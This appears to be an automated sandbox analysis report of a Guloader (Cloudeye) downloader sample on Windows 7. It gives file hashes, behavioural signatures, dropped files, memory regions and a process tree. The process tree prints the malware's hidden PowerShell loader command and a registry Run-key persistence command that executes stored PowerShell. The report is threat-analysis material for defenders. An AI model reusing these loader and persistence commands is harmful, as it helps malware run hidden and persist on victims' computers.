Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    25-04-2024 01:43

General

  • Target

    8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe

  • Size

    987KB

  • MD5

    189590b2755ed6f134d8fe2c05124926

  • SHA1

    e492eb975348e50a32c792d26441cc00912987e7

  • SHA256

    8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27

  • SHA512

    bf1280546ff4dacddd1b5d08a3a447bb8ccbe2e7c974654e43a266507d6c82080b6f802e4e96ef9f6c5dc0dbc43df64782d66d99e134797971427e88c32219fb

  • SSDEEP

    24576:gIqqULDjF7yCOrJHFTuvMJbmhQU/YydIE5Lt6:9sxANuvMxmhB/Yly6

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe
    "C:\Users\Admin\AppData\Local\Temp\8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\Admin\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        3⤵
          PID:2392
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:1908
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:680
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      61176223919926c47b2d40aca8bdd33a

      SHA1

      980f0df56d7d482538cacdedb10f08890fe9d1c6

      SHA256

      acff8f1e29f7fc7424b0b1ae9c53afe12fdc6725548192f34a7a5935f48d242f

      SHA512

      16711f9ba924ca32dca24e2ca8d026c90ad1f8f1909b1f2c5b56c2e3bd08bb1284155e936ee690410350dbe253377b5558b0271151a4ca697507578698c22aba

    • C:\Users\Admin\AppData\Local\Temp\Cab6164.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar62B2.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out

      Filesize

      60KB

      MD5

      030ce4392c4a8cc1b477bc3deeacb683

      SHA1

      8f36406d9572e6ccf966fb69c0934c234e0617e6

      SHA256

      7e9decd5f91e30b000266db010c2ad399bfd06f64ec43f48ca0f3bc36d69ca6c

      SHA512

      3ec59592857d073ea3f59cd5279fdd4d862ba0a102de7bb3f96db73b64af362c5f017802afe78cb5299a0185f406e4fec097c9986b74d591183ab2aba114e4f4

    • C:\Users\Admin\AppData\Local\nervier\Estampede\sipunculacean\Sammenrends.Sla

      Filesize

      295KB

      MD5

      3a62f30a51fea9390cd360b7f581c4b3

      SHA1

      afdb9cd054c757b7f65dc150ed2dbbf061f8fab2

      SHA256

      f990b58058ccb0cdf3f0f64c78c24b8f41f5228f90c823369e49decbdc791f05

      SHA512

      b25f81bc7c9c8e43027dff70c9d8ce5cc4c1a803abfc3c193ab80d638e5bbd22e6bb382266bcc69872185ea7ebe6bedc05125d04b7b7420b98e931e6d3ad098b

    • memory/1892-17-0x00000000029C0000-0x0000000002A00000-memory.dmp

      Filesize

      256KB

    • memory/1892-18-0x00000000742D0000-0x000000007487B000-memory.dmp

      Filesize

      5.7MB

    • memory/1892-24-0x0000000006560000-0x0000000007132000-memory.dmp

      Filesize

      11.8MB

    • memory/1892-25-0x0000000006560000-0x0000000007132000-memory.dmp

      Filesize

      11.8MB

    • memory/1892-26-0x0000000077610000-0x00000000777B9000-memory.dmp

      Filesize

      1.7MB

    • memory/1892-27-0x0000000077800000-0x00000000778D6000-memory.dmp

      Filesize

      856KB

    • memory/1892-28-0x00000000742D0000-0x000000007487B000-memory.dmp

      Filesize

      5.7MB

    • memory/1892-117-0x0000000006560000-0x0000000007132000-memory.dmp

      Filesize

      11.8MB

    • memory/1892-121-0x0000000006560000-0x0000000007132000-memory.dmp

      Filesize

      11.8MB

    • memory/1892-16-0x00000000742D0000-0x000000007487B000-memory.dmp

      Filesize

      5.7MB

    • memory/1892-29-0x00000000029C0000-0x0000000002A00000-memory.dmp

      Filesize

      256KB

    • memory/1892-19-0x00000000029C0000-0x0000000002A00000-memory.dmp

      Filesize

      256KB

    • memory/1892-21-0x00000000029C0000-0x0000000002A00000-memory.dmp

      Filesize

      256KB

    • memory/1892-23-0x0000000005420000-0x0000000005424000-memory.dmp

      Filesize

      16KB

    • memory/1908-33-0x0000000077800000-0x00000000778D6000-memory.dmp

      Filesize

      856KB

    • memory/1908-118-0x0000000077800000-0x00000000778D6000-memory.dmp

      Filesize

      856KB

    • memory/1908-32-0x0000000077836000-0x0000000077837000-memory.dmp

      Filesize

      4KB

    • memory/1908-31-0x0000000077610000-0x00000000777B9000-memory.dmp

      Filesize

      1.7MB

    • memory/1908-119-0x0000000001310000-0x0000000001EE2000-memory.dmp

      Filesize

      11.8MB

    • memory/1908-30-0x0000000001310000-0x0000000001EE2000-memory.dmp

      Filesize

      11.8MB